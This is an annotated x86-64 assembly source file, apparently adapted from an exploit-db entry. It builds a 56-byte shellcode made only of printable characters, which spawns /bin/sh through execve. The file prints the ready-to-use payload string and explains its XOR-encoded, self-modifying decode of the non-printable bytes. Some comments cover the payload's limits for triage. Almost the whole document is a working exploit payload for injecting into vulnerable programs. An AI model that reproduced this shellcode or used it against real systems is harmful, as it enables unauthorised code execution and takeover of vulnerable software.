# Slightly modified from: https://www.exploit-db.com/exploits/35205/
# Assembled (56 bytes):
# h/A//XH5PQO/P^hj5XVX1Fm1FuH3FqPTj0X40PP4u4NZ4jWSEW18EF0V
#
# Assembly:
# user@host $ as binsh.s -o binsh.o ; strings binsh.o
#
# What this is: an x86-64 Linux execve("/bin/sh", NULL, NULL) payload in
# which every byte is a printable character (the 56-byte string above).
# "pop %rsi", "pop %rdi" and "syscall" have no printable encoding, so those
# four bytes and the "/bin/sh\0" string are stored XOR-encoded
# (encoded_code / encoded_data) and decoded at runtime with the 4-byte key
# 0x5658356a (memory order: 6a 35 58 56).
#
# Syntax: GAS, AT&T operand order (op src, dst).
# ABI:    raw Linux x86-64 syscall (rax = nr; args rdi, rsi, rdx).
#
# Properties fixed by the code itself (relevant when triaging a sample):
#   - The decode base in %rsi is an ABSOLUTE address (0x60107f), not
#     %rip-relative.  The two decode stores target %rsi+0x6d and %rsi+0x75,
#     so the payload only functions when loaded at the exact layout the
#     author assumed; at any other address the stores hit the wrong memory
#     and the encoded bytes are executed as-is.
#   - "xor %eax, 0x6d(%rsi)" rewrites the payload's own instruction bytes:
#     the page holding it must be writable AND executable.  NX / W^X
#     memory stops it at the first decode store (fault, not a shell).
#   - Apart from that base address and a usable stack, no incoming
#     register state is relied on; every value is built from immediates.

.section .data

.section .text
.globl _start
_start:
    # "h/A//XH5PQO/P^" -- build the decode base pointer.
    # push imm32 sign-extends to 64 bits; both immediates are positive,
    # so the upper 32 bits of %rax stay zero throughout.
    push $0x2f2f412f            # 'h/A//'
    pop %rax                    # 'X'
    xor $0x2f4f5150, %rax       # 'H5PQO/'  RAX becomes 0x60107f (0x2f2f412f ^ 0x2f4f5150). it's close to the buffer of 'name'. use it as the base of shellcode
    push %rax                   # 'P'
    pop %rsi                    # '^'  Make use of '^', AKA pop %rsi -- %rsi = decode base

prepare_key:    # "hj5XVX"
    # put the xor key into %eax.  0x5658356a is bytes 6a 35 58 56 in memory
    # order; the same key decodes both encoded_code and encoded_data.
    push $0x5658356a            # 'hj5XV' pushed backwards because x86 stack.
    pop %rax                    # 'X'   %rax = 0x000000005658356a (upper half still zero)

decode_encoded_code:   # "1Fm"  (the upstream version used "1FK", i.e. 0x4b(%rsi))
    #xor %eax, 0x4b(%rsi)  # '1FK' encoded_code ; pops & syscall decoded
    # Memory-destination xor: writes the 4 decoded bytes back into
    # encoded_code in place (self-modifying code).
    #   34 6a 57 53  ^  6a 35 58 56  =  5e 5f 0f 05   (pop %rsi; pop %rdi; syscall)
    xor %eax, 0x6d(%rsi)   # '1Fm' encoded_code ; pops & syscall decoded

decode_encoded_data:    # "1FuH3Fq"
    # First store decodes the upper half of encoded_data in place:
    #   45 46 30 56  ^  6a 35 58 56  =  2f 73 68 00   ("/sh\0")
    xor %eax, 0x75(%rsi)   # '1Fu' encoded_data + 4 ; "/sh\0" decoded
    # Memory-SOURCE xor: reads the qword at encoded_data into %rax, writes
    # nothing back.  The key's upper half is zero, so only the low 4 bytes
    # change: 45 57 31 38 ^ 6a 35 58 56 = 2f 62 69 6e ("/bin"); the
    # already-decoded "/sh\0" passes through unchanged.
    xor 0x71(%rsi), %rax   # 'H3Fq' encoded_data ; "/bin/sh\0" now in %rax

begin_stack_setup:  # "PT"
    push %rax   # 'P' push "/bin/sh\0"  (8 bytes, NUL-terminated, now on the stack)
    push %rsp   # 'T' push pointer to /bin/sh  (address of the string just pushed)

zero_rax:   # "j0X40"
    # xor %rax, %rax  -- not printable, so zero %rax via push / pop / xor %al
    push $0x30   # 'j0'  sign-extended push of 0x30; upper bits zero
    pop %rax    # 'X'
    xor $0x30, %al  # '40' %rax is NULL  (0x30 ^ 0x30 = 0; upper bytes were already 0)

end_stack_setup:  # "PP"
    push %rax   # 'P' push NULL  -> popped into %rsi (argv) by the decoded code
    push %rax   # 'P' push NULL  -> popped into %rdx (envp) at begin_stack_run

mov_3b_al:  # "4u4N"
    # mov $0x3b, %al  -- not printable; two xors on %al produce the same value
    xor $0x75, %al  # '4u'  %al = 0x75
    xor $0x4e, %al  # '4N' %al = 0x4e xor 0x75 = $0x3b
    # this is for syscall ^  (0x3b = execve on x86-64 Linux; rest of %rax is 0)

begin_stack_run:  # "Z"
    pop %rdx   # 'Z' mov $0x00, %rdx ; %rdx = NULL (envp)
    # Execution falls straight through into encoded_code, which
    # decode_encoded_code has already rewritten in place.  Stack, top first:
    # NULL (argv), pointer to "/bin/sh\0", "/bin/sh\0".

encoded_code:   # "4jWS"
    # 0x34 0x6a 0x57 0x53   (as stored on disk / in the 56-byte string)
    # AFTER XOR MAGIC (key bytes 6a 35 58 56):
    .byte 0x34  # "\x5e" pop %rsi ; %rsi = NULL (argv)
    .byte 0x6a  # "\x5f" pop %rdi ; %rdi = pointer to "/bin/sh\0" (pathname)
    .byte 0x57  # "\x0f"
    .byte 0x53  # "\x05" syscall ; execve("/bin/sh\0",NULL,NULL);
    # syscall(%rax) = function(%rdi,%rsi,%rdx);
    # syscall(0x3b) = execve("/bin/sh\0",NULL,NULL);
    # If the decode store did not reach these bytes (different load address),
    # the CPU executes the undecoded "4jWS" and encoded_data instead.

encoded_data:   # "EW18EF0V" turns into "/bin/sh\0"
    # 0x45 0x57 0x31 0x38 0x45 0x46 0x30 0x56
    # AFTER XOR MAGIC.  Note only bytes 4..7 are rewritten in memory; bytes
    # 0..3 are decoded into %rax by the memory-source xor above and remain
    # encoded here.  The usable string is the copy pushed onto the stack.
    .byte 0x45  # /
    .byte 0x57  # b
    .byte 0x31  # i
    .byte 0x38  # n
    .byte 0x45  # /
    .byte 0x46  # s
    .byte 0x30  # h
    .byte 0x56  # \0